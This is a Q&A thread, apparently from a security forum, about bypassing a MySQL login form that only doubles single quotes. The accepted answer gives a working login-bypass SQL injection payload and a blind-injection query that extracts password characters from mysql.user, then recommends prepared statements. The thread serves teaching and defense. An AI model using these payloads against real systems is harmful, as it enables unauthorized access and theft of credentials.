# Breaking mysql username and password form

Tags: authentication, passwords, sql-injection, mysql

I have two versions of a website. The first one has no security precautions against sql injections. So if I try something like:

```
Username: hello_world
Password: ' or ' 1=1
```

I'll be signed in as the user `hello_world`.

The second version of the website escapes single quotes to two single quotes. So the first attack I used on the first version doesn't work. When I get a successful login on the first version, I get a response that says:

```
username = hello_world & password = %27%20or%20%27%201%3D1
```

So all of the special characters are being replaced by their hex value. When I try something like this:

```
Username = hello_world
Password = %27%20or%20%27%201%3D1
```

In the second version of the site, it doesn't work (because the `%` is being changed to its hex value).

Is there a way I can log in as the user `hello_world`?

*NOTE: I do, in fact, have permission to perform tests on this site.*

Comment: "The second version of the website escapes single quotes to two single quotes." What does that mean? `' -> "`?

Comment: It would be two single quotes together, like ' to ' and ' together.

Answer (score 3, accepted):

> The second version of the website escapes single quotes to two single quotes.
>
> Is there a way I can log in as the user hello_world?

Yes, because this kind of protection is not secure at all (I also would not call it escaping).

**Attack**

Imagine an attack like this:

```
Username: hello_world
Password: \' OR 1=1 #
```

Which would be transformed to:

```
Password: \'' OR 1=1 #
```

Which would probably look like this in a query:

```
SELECT * FROM users WHERE username='hello_world' AND password='\'' OR 1=1 #'
```

Which is then executed like this, because the comment (`#`) cuts of the rest of the query:

```
SELECT * FROM users WHERE username='hello_world' AND password='\'' OR 1=1
```

So it checks if your password is `\'` or if `1=1` (which it does) to authenticate the user `hello_world`.

**Further Damage**

Note also that login bypass isn't the only attack that can be done here.

Data can also be retrieved via blind SQL injection (true = logged in, false = not logged in):

```
SELECT * FROM users WHERE username='hello_world' AND password='\'' OR ascii(substring((SELECT password FROM mysql.user LIMIT 0,1),1,1))<100
[ etc. ]
```

It is a noisy attack on a login page, but still, it could cause serious damage.

**Prevention**

Filtering is the worst kind of protection against SQL injections. Escaping (eg via `mysqli_real_escape_string`) is better, and using prepared statements is best (they are harder to mess up than escaping).

Answer (score 0):

This depends on your understanding of "special characters". If you filter out every character that's not alphanumeric, you might be safe, but I can't answer a "yes" on this for sure.

Generally, it is not a good idea to implement your own security checks for database queries.
Instead, use built-in functions like [mysql_real_escape_string()](http://php.net/manual/en/function.mysql-real-escape-string.php) (if you're using PHP for example).
Also, you should use [prepared statements](http://dev.mysql.com/doc/refman/5.0/en/sql-syntax-prepared-statements.html). Those are SQL queries with placeholders for user input. This guarantees that user input is not interpreted as a SQL keyword/function/separator.